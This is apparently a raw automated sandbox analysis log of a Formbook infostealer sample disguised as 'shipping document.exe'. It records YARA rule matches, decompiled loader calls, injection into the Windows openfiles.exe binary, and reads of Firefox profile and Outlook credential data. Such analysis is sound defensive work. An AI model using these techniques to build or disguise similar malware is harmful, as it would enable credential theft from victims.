              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048BB1B07_2_048BB1B0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E516C7_2_048E516C
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0489F1727_2_0489F172
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0497B16B7_2_0497B16B
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048B52A07_2_048B52A0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048CB2C07_2_048CB2C0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049512ED7_2_049512ED
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048CD2F07_2_048CD2F0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048F739A7_2_048F739A
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0496132D7_2_0496132D
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0489D34C7_2_0489D34C
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0496FCF27_2_0496FCF2
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04929C327_2_04929C32
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048CFDC07_2_048CFDC0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048B3D407_2_048B3D40
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04961D5A7_2_04961D5A
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04967D737_2_04967D73
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048B9EB07_2_048B9EB0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048B1F927_2_048B1F92
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0496FFB17_2_0496FFB1
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04873FD57_2_04873FD5
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04873FD27_2_04873FD2
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0496FF097_2_0496FF09
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048B38E07_2_048B38E0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0491D8007_2_0491D800
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049459107_2_04945910
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048B99507_2_048B9950
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048CB9507_2_048CB950
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048F5AA07_2_048F5AA0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04951AA37_2_04951AA3
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0494DAAC7_2_0494DAAC
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0495DAC67_2_0495DAC6
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04967A467_2_04967A46
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0496FA497_2_0496FA49
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04923A6C7_2_04923A6C
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048CFB807_2_048CFB80
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04925BF07_2_04925BF0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048EDBF97_2_048EDBF9
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0496FB767_2_0496FB76
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_027A14407_2_027A1440
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0279C6007_2_0279C600
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0279C5F77_2_0279C5F7
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0279C8207_2_0279C820
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0279A8A07_2_0279A8A0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_027A2F5A7_2_027A2F5A
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_027A2FA07_2_027A2FA0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_027911217_2_02791121
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_027B9FB07_2_027B9FB0
              Source: C:\Users\user\Desktop\shipping document.exe; Code function: String function: 0175B970 appears 262 times
              Source: C:\Users\user\Desktop\shipping document.exe; Code function: String function: 017B7E54 appears 107 times
              Source: C:\Users\user\Desktop\shipping document.exe; Code function: String function: 017DEA12 appears 86 times
              Source: C:\Users\user\Desktop\shipping document.exe; Code function: String function: 017EF290 appears 103 times
              Source: C:\Users\user\Desktop\shipping document.exe; Code function: String function: 017A5130 appears 58 times
              Source: C:\Windows\SysWOW64\openfiles.exe; Code function: String function: 0489B970 appears 262 times
              Source: C:\Windows\SysWOW64\openfiles.exe; Code function: String function: 048F7E54 appears 107 times
              Source: C:\Windows\SysWOW64\openfiles.exe; Code function: String function: 0492F290 appears 103 times
              Source: C:\Windows\SysWOW64\openfiles.exe; Code function: String function: 0491EA12 appears 86 times
              Source: C:\Windows\SysWOW64\openfiles.exe; Code function: String function: 048E5130 appears 58 times
              Source: shipping document.exe, 00000000.00000000.1653959453.0000000001004000.00000002.00000001.01000000.00000003.sdmp; Binary or memory string: OriginalFilenameTrlj.exe: vs shipping document.exe
              Source: shipping document.exe, 00000000.00000002.1683528991.000000000A640000.00000004.08000000.00040000.00000000.sdmp; Binary or memory string: OriginalFilenameTyrone.dll8 vs shipping document.exe
              Source: shipping document.exe, 00000000.00000002.1675172411.00000000014DE000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameclr.dllT vs shipping document.exe
              Source: shipping document.exe, 00000002.00000002.2033082089.00000000011D8000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameopnfiles.exej% vs shipping document.exe
              Source: shipping document.exe, 00000002.00000002.2033082089.00000000011FE000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameopnfiles.exej% vs shipping document.exe
              Source: shipping document.exe, 00000002.00000002.2033450578.000000000185D000.00000040.00001000.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamentdll.dllj% vs shipping document.exe
              Source: shipping document.exe; Binary or memory string: OriginalFilenameTrlj.exe: vs shipping document.exe
              Source: shipping document.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 2.2.shipping document.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 2.2.shipping document.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000007.00000002.4110883708.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000008.00000002.4113195669.0000000005770000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000002.00000002.2034898129.0000000002530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000007.00000002.4110925188.0000000004700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000002.00000002.2034731642.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: shipping document.exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 0.2.shipping document.exe.43a9970.2.raw.unpack, V4uC3Iifq56IKQcfry.cs; Cryptographic APIs: 'CreateDecryptor'
              Source: 0.2.shipping document.exe.5ad0000.5.raw.unpack, V4uC3Iifq56IKQcfry.cs; Cryptographic APIs: 'CreateDecryptor'
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, GyxdDdUhXZvol2uJqL.cs; Security API names: _0020.SetAccessControl
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, GyxdDdUhXZvol2uJqL.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, GyxdDdUhXZvol2uJqL.cs; Security API names: _0020.AddAccessRule
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, YDmVa3b2SMMfc8PDHv.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, GyxdDdUhXZvol2uJqL.cs; Security API names: _0020.SetAccessControl
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, GyxdDdUhXZvol2uJqL.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, GyxdDdUhXZvol2uJqL.cs; Security API names: _0020.AddAccessRule
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, YDmVa3b2SMMfc8PDHv.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.shipping document.exe.357f9d0.1.raw.unpack, ReactionVessel.cs; Suspicious method names: .ReactionVessel.Inject
              Source: 0.2.shipping document.exe.5c30000.6.raw.unpack, ReactionVessel.cs; Suspicious method names: .ReactionVessel.Inject
              Source: 0.2.shipping document.exe.359004c.0.raw.unpack, ReactionVessel.cs; Suspicious method names: .ReactionVessel.Inject
              Source: classification engine; Classification label: mal100.troj.spyw.evad.winEXE@7/2@16/11
              Source: C:\Users\user\Desktop\shipping document.exe; File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\shipping document.exe.log
              Source: C:\Users\user\Desktop\shipping document.exe; Mutant created: NULL
              Source: C:\Windows\SysWOW64\openfiles.exe; File created: C:\Users\user\AppData\Local\Temp\03F67l1929
              Source: shipping document.exe; Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
              Source: C:\Program Files\Mozilla Firefox\firefox.exe; File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Users\user\Desktop\shipping document.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: openfiles.exe, 00000007.00000003.2210074668.0000000002B56000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4110059356.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4110059356.0000000002B56000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: shipping document.exe; ReversingLabs: Detection: 23%
              Source: shipping document.exe; Virustotal: Detection: 35%
              Source: unknown; Process created: C:\Users\user\Desktop\shipping document.exe "C:\Users\user\Desktop\shipping document.exe"
              Source: C:\Users\user\Desktop\shipping document.exe; Process created: C:\Users\user\Desktop\shipping document.exe "C:\Users\user\Desktop\shipping document.exe"
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe; Process created: C:\Windows\SysWOW64\openfiles.exe "C:\Windows\SysWOW64\openfiles.exe"
              Source: C:\Windows\SysWOW64\openfiles.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Users\user\Desktop\shipping document.exe; Section loaded: mscoree.dll
              Source: C:\Users\user\Desktop\shipping document.exe; Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\shipping document.exe; Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\shipping document.exe; Section loaded: version.dll
              Source: C:\Users\user\Desktop\shipping document.exe; Section loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\Desktop\shipping document.exe; Section loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\Desktop\shipping document.exe; Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\shipping document.exe; Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\shipping document.exe; Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\shipping document.exe; Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\shipping document.exe; Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\shipping document.exe; Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\shipping document.exe; Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\shipping document.exe; Section loaded: dwrite.dll
              Source: C:\Users\user\Desktop\shipping document.exe; Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\shipping document.exe; Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\shipping document.exe; Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\shipping document.exe; Section loaded: gpapi.dll
              Source: C:\Users\user\Desktop\shipping document.exe; Section loaded: windowscodecs.dll
              Source: C:\Windows\SysWOW64\openfiles.exe; Section loaded: mpr.dll
              Source: C:\Windows\SysWOW64\openfiles.exe; Section loaded: framedynos.dll
              Source: C:\Windows\SysWOW64\openfiles.exe; Section loaded: version.dll
              Source: C:\Windows\SysWOW64\openfiles.exe; Section loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\openfiles.exe; Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\openfiles.exe; Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\openfiles.exe; Section loaded: wininet.dll
              Source: C:\Windows\SysWOW64\openfiles.exe; Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\openfiles.exe; Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\openfiles.exe; Section loaded: ieframe.dll
              Source: C:\Windows\SysWOW64\openfiles.exe; Section loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\openfiles.exe; Section loaded: netapi32.dll
              Source: C:\Windows\SysWOW64\openfiles.exe; Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\openfiles.exe; Section loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\openfiles.exe; Section loaded: wkscli.dll
              Source: C:\Windows\SysWOW64\openfiles.exe; Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\openfiles.exe; Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\openfiles.exe; Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\openfiles.exe; Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\openfiles.exe; Section loaded: mlang.dll
              Source: C:\Windows\SysWOW64\openfiles.exe; Section loaded: propsys.dll
              Source: C:\Windows\SysWOW64\openfiles.exe; Section loaded: winsqlite3.dll
              Source: C:\Windows\SysWOW64\openfiles.exe; Section loaded: vaultcli.dll
              Source: C:\Windows\SysWOW64\openfiles.exe; Section loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\openfiles.exe; Section loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\openfiles.exe; Section loaded: cryptbase.dll
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe; Section loaded: wininet.dll
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe; Section loaded: mswsock.dll
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
              Source: shipping document.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: shipping document.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: OpnFiles.pdb source: shipping document.exe, 00000002.00000002.2033082089.00000000011D8000.00000004.00000020.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000002.4110369739.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000003.1965995700.00000000014EC000.00000004.00000001.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000002.4110369739.00000000014D8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oWRaEnEJAq.exe, 00000006.00000002.4109844179.0000000000B7E000.00000002.00000001.01000000.0000000C.sdmp, oWRaEnEJAq.exe, 00000008.00000000.2100219438.0000000000B7E000.00000002.00000001.01000000.0000000C.sdmp
              Source: Binary string: wntdll.pdbUGP source: shipping document.exe, 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000003.2033163379.0000000004507000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000003.2035061028.00000000046BE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: shipping document.exe, shipping document.exe, 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, openfiles.exe, 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000003.2033163379.0000000004507000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000003.2035061028.00000000046BE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: OpnFiles.pdbGCTL source: shipping document.exe, 00000002.00000002.2033082089.00000000011D8000.00000004.00000020.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000002.4110369739.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000003.1965995700.00000000014EC000.00000004.00000001.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000002.4110369739.00000000014D8000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: 0.2.shipping document.exe.43a9970.2.raw.unpack, V4uC3Iifq56IKQcfry.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 0.2.shipping document.exe.5ad0000.5.raw.unpack, V4uC3Iifq56IKQcfry.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: shipping document.exe, OptionsForm.cs.Net Code: InitializeComponent
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, GyxdDdUhXZvol2uJqL.cs.Net Code: XDAt7X96fy System.Reflection.Assembly.Load(byte[])
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, GyxdDdUhXZvol2uJqL.cs.Net Code: XDAt7X96fy System.Reflection.Assembly.Load(byte[])
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 0_2_0315DB84 pushfd ; ret 0_2_0315DB89
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 0_2_07C53E3A push ds; ret 0_2_07C53E3B
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_00401873 pushad ; iretd 2_2_00401874
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0041E88B push 78FC4EB7h; retf 2_2_0041E89B
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0040BCDD push edi; ret 2_2_0040BCDE
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_004014A7 push cs; iretd 2_2_00401525
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_004014B0 push cs; iretd 2_2_00401525
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_004035C0 push eax; ret 2_2_004035C2
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0040A5FC push di; iretd 2_2_0040A604
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_00418656 push ecx; ret 2_2_00418657
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0173225F pushad ; ret 2_2_017327F9
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017327FA pushad ; ret 2_2_017327F9
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017609AD push ecx; mov dword ptr [esp], ecx2_2_017609B6
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0173283D push eax; iretd 2_2_01732858
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeCode function: 6_2_03B25BF3 push esp; iretd 6_2_03B25C1E
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeCode function: 6_2_03B1EAA1 push 78FC4EB7h; retf 6_2_03B1EAB1
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeCode function: 6_2_03B0A818 push di; iretd 6_2_03B0A81A
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeCode function: 6_2_03B1886C push ecx; ret 6_2_03B1886D
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeCode function: 6_2_03B0BEF3 push edi; ret 6_2_03B0BEF4
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048727FA pushad ; ret 7_2_048727F9
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0487225F pushad ; ret 7_2_048727F9
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0487283D push eax; iretd 7_2_04872858
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048A09AD push ecx; mov dword ptr [esp], ecx7_2_048A09B6
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0279871A push edi; ret 7_2_0279871B
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_027AB2C8 push 78FC4EB7h; retf 7_2_027AB2D8
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0279703F push di; iretd 7_2_02797041
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_027A5093 push ecx; ret 7_2_027A5094
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_027A5115 push esp; retf D771h7_2_027A50E1
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_027A7AF5 push esp; ret 7_2_027A7AF6
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_027A7C90 push edx; ret 7_2_027A7C96
              Source: shipping document.exeStatic PE information: section name: .text entropy: 7.9656292226257115
